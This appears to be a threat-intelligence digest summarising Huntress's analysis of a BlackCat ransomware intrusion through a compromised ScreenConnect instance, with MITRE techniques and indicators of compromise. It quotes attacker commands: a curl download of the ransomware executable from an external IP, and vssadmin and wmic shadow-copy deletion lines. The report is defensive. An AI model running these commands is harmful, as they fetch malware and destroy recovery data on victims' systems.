Threat Research

BlackCat Ransomware Affiliate TTPs | Huntress

Securonix

Security researchers detail Huntress’s analysis of the ALPHV/BlackCat ransomware affiliate operation, focusing on a ScreenConnect compromise used to deploy BlackCat and move laterally while evading defenses. The report emphasizes embedded RaaS commands to disable security tools and the need for up-to-date asset inventories and attack surface reduction to prevent similar intrusions. #BlackCat #ALPHV #ScreenConnect #RaaS #Huntress #CISA #FBI

Keypoints

  • The investigation centers on a ScreenConnect compromise that led to a BlackCat ransomware deployment within a healthcare-associated endpoint.
  • Two ScreenConnect instances were involved; one appeared legitimate (version 23.9.8.8811) and the other likely compromised (installed 2022-03-28).
  • Attackers downloaded the ransomware executable from a remote host and attempted to bypass defenses by disabling Windows Defender.
  • Embedded ransomware commands enabled lateral movement using credential theft/remote execution tools (e.g., psexec) across endpoints in the same infrastructure.
  • Observed network activity involved internal IP ranges (10.x.x.x and 192.168.x.x) and a possibly dynamic domain (REDACTED.ddns.net).
  • The incident underscores the importance of accurate asset inventories and reducing attack surfaces to prevent access via legitimate-but-exposed applications.

MITRE Techniques

  • [T1190] Exploit Public Facing Application – The threat actor accessed the endpoint via the second ScreenConnect instance. “The threat actor accessed the endpoint via the second identified ScreenConnect instance.”
  • [T1078.002] Valid Domain Accounts – A specific username connected to the ScreenConnect instance, indicating use of valid credentials. “shortly after the instance was installed on March 28, 2022, a specific username connected to the instance.”
  • [T1059.003] Windows Command Shell – The attacker executed commands from a Windows shell, including a direct download command. “The following command was executed: curl http://94.131.109[.]54:6531/iw0pjCKEzADKTMA5Xkv8ZxS6.exe -O”
  • [T1562.001] Disable/Modify Tools – Defender protections were suppressed by manipulating defender settings. “the Windows Defender SpyNetReporting value was changed from 2 to 0, essentially disabling the functionality.”
  • [T1490] Inhibit System Recovery – The ransomware run included shadow copy and service control commands to hinder recovery. “vssadmin.exe Delete Shadows /all /quiet” and “wmic.exe Shadowcopy Delete”
  • [T1486] Data Encrypted For Impact – The ransomware is designed to encrypt or otherwise impact data, with embedded commands to obviate recovery. “embedded commands and credentials that allowed the ransomware executable to move laterally”

Indicators of Compromise

  • [IP Address] – 94.131.109.54:6531 (download source) and internal endpoints – 10.x.x.x, 192.168.x.x
  • [Domain] – REDACTED.ddns.net
  • [File] – iw0pjCKEzADKTMA5Xkv8ZxS6.exe, C:WindowsSystem32iw0pjCKEzADKTMA5Xkv8ZxS6.exe
  • [File] – curl.exe, and 2 more (for download/remote commands) – 94.131.109.54:6531

Read more: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint